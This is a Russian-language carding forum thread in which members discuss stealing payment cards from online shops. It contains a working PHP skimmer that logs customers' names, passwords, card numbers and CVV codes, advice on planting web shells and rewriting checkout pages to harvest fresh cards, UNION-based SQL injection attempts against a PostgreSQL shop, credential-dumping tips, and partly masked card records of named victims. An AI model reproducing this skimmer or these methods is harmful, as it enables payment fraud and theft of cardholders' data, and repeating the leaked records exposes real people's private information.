Видео: SQL - инъекция, добыча картона.

Частенько находит.
<?PHP
$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$dob = $_POST['dob'];
$email_address = $_POST['email_address'];
$street_address = $_POST['street_address'];
$postcode = $_POST['postcode'];
$city = $_POST['city'];
$password = $_POST['password'];
$confirmation = $_POST['confirmation'];
$card_number = $_POST['card_number'];
$expiration = $_POST['expiration'];
$holdername = $_POST['holdername'];
$cvvcode = $_POST['cvvcode'];

$log = fopen("base.php","a+");
fwrite($log,"\n $firstname:$lastname:$dob:$email_address:$street_address:$postcode:$city:$password:$confirmation:$card_number:$expiration:$holdername:$cvvcode \n");
fclose($log);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://куда послать юзера после того как ввел данные'></head></html>";
?>
Click to expand...
Так же нужно изменить саму страницу, что бы проходило через этот скрип.

---------- Сообщение добавлено в 16:12 ---------- Предыдущее сообщение размещено в 16:11 ----------

И все под себя подогнать.
 
DJ4J, полазил я по твоему шопу(_huntmysteries.com), ради практики и интереса ;)
Вобщем добрался до картона. Но он там в таком виде:


5
Visa:Brick Despain:XXXXXXXXXXXX2444:0508:
By 3, 2 : 1


5
Visa:Patrick B Dillon:XXXXXXXXXXXX9396:1010:
By 3, 2 : 1


5
Visa:James Gale:XXXXXXXXXXXX5553:0808:
By 3, 2 : 1


5
Visa:john jacobson:XXXXXXXXXXXX5071:0110:
By 3, 2 : 1


5
Visa:Allison Petersen:XXXXXXXXXXXX4829:0808:
Click to expand...

И свв к ним нет. Passion, когда такое всеречается, можно ХХХ обойти/открыть, или уже все, картон не достать?
 
Last edited:
так я же говорил что он в открытом виде не хранится.

Вроде никак не достать .
 
DJ4J, значит я тебя не понял. подумал ты добраться до картона не смог ;)
Получается в таких случаях через залитый шелл можно выдернуть? правильно?
 
goldeff, я такое не встречал, но я бы попробовал залить шелл туда(пригодится на всякий случай)) и так же бы изменил страницу куда вбивают картон, что бы проходили данные через скрипт и записывались в базу. Был бы каждый раз свежий картон. Видимо шоп закрывает данные на XXX, но все равно когда холдер вводит данные они в нормальном виде и так же для себя думаю он где-то хранит в нормальном виде картон.

---------- Сообщение добавлено в 18:31 ---------- Предыдущее сообщение размещено в 18:28 ----------

Сливай мыла и пароли, чекай на валид и смотри палку или другие плат. системы у юзеров.
 
В любом случае шелы неплохо скупают.
Во время поиска шопа с картоном можно залить несколько штучек.
Проблемы были только с поиском админки.
 
У меня в одном из шопов жизненоважная инфа показывается в виде кодировки ( %5C%AD%BA%05%02 или R%2AW%DE%B7%EE%13%8A%98%5E%CD%B6M9T%E6). Кто подскажет что это за вид хеша?
 
Это как выводится, ручками или программой?
 
Passion said:
Это как выводится, ручками или программой?
Click to expand...

прогой......захешены только cvv и номер карты...все остальное открыто....покопался на insider' е....не увидел похожих

p.s. прога не панголин и не хелпер (больно уж низкие у них результаты отображения данных).

Самое смешное,что руками никак не выходит раскрыть шоп.....вот такая засада....
 
Last edited:
PokerLife, что за софтина такая?
Логин и пароль же можешь слить админа?
 
Passion said:
PokerLife, что за софтина такая?
Логин и пароль же можешь слить админа?
Click to expand...

пассы и мыльники норм открываются....софт скинул в пм...
 
Такая ситуация. Есть ошибка для инъекции, смог определить количество таблиц, а дальше при определении таблици с которой надо работать (id=1+union+select+1,2,3,4,5,6--) выдает только это:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: each UNION query must have the same number of columns in /usr/www/cmr/productdetail.php on line 60

Warning: pg_num_rows(): supplied argument is not a valid PostgreSQL result resource in /usr/www/cmr/productdetail.php on line 61

Warning: pg_query() [function.pg-query]: Query failed: ERROR: UNION types character varying and integer cannot be matched in /usr/www/cmr/includes/leftnav.php on line 39

Warning: pg_num_rows(): supplied argument is not a valid PostgreSQL result resource in /usr/www/cmr/includes/leftnav.php on line 40
Click to expand...

типа все? дальше не пройти?

хелпер тоже не может взломать. но ошибка при id=1' появляется, при id=1 уходит. и количество таблиц дает определить.
 
Last edited:
goldeff said:
Такая ситуация. Есть ошибка для инъекции, смог определить количество таблиц, а дальше при определении таблици с которой надо работать (id=1+union+select+1,2,3,4,5,6--) выдает только это:


типа все? дальше не пройти?

хелпер тоже не может взломать. но ошибка при id=1' появляется, при id=1 уходит. и количество таблиц дает определить.
Click to expand...
не забывай что это не MySql это PostgreSQL
 
goldeff said:
Такая ситуация. Есть ошибка для инъекции, смог определить количество таблиц, а дальше при определении таблици с которой надо работать (id=1+union+select+1,2,3,4,5,6--) выдает только это:


типа все? дальше не пройти?

хелпер тоже не может взломать. но ошибка при id=1' появляется, при id=1 уходит. и количество таблиц дает определить.
Click to expand...

проштудируй ачат..там не раз писали наскольк опомню о подобном..и вообще на эту тему там масса информации
 
PokerLife said:
У меня в одном из шопов жизненоважная инфа показывается в виде кодировки ( %5C%AD%BA%05%02 или R%2AW%DE%B7%EE%13%8A%98%5E%CD%B6M9T%E6). Кто подскажет что это за вид хеша?
Click to expand...

вот именно кодировка, но не хешь, (во всяком случае я таких хешей не встречал) скриптов для кодировки множество, какой хз
 
не забывай что это не MySql это PostgreSQL
Click to expand...
pg не раскрутить? только мускль?
только начал осваивать немного эту тему. учусь типа :)
На ачате слишком много инфы, мозги кипят. а хочется побыстрее разобраться, шоп хороший :)
 
goldeff said:
pg не раскрутить? только мускль?
только начал осваивать немного эту тему. учусь типа :)
На ачате слишком много инфы, мозги кипят. а хочется побыстрее разобраться, шоп хороший :)
Click to expand...

как же так не раскрутить -)
быть не может если есть иньекция, иногда бывает просто ошибка (тоже нужно учесть)
 
goldeff, запили мессагу forum.antichat.ru/thread46016.html

ps forum.antichat.ru/thread35599.html
 
Last edited:
пол дня шоп искал, а там такая хрень с картоном:
VISA:Alan P. Dine:m��'ߕ�<��z�5ؗyG���b�$�:834:08:2011

VISA:Guy R Smith:S�BEj�z�4���yG���b�$�:363:03:2012

VISA:JACI REED:w���T*��)_��7ǛvE����0��;�:596:06:2010
Click to expand...

Знает, кто, как расшифровать?
 
You must log in or register to reply here.

Similar threads

Friend
Обзор хакерства в кардинге
Replies
0
Views
260
Friend
Friend
Man
eBay | Рега | Прогрев | Фрод
Replies
0
Views
636
Man
Man
Man
Подробный мануал по скаму ebay kleinanzeigen
Replies
0
Views
631
Man
Man
Man
Как поднять свой Double VPN, Triple VPN
Replies
0
Views
285
Man
Man
Man
Как решить задачу по взлому кредитных карт DEF CON
Replies
0
Views
245
Man
Man
Back
Top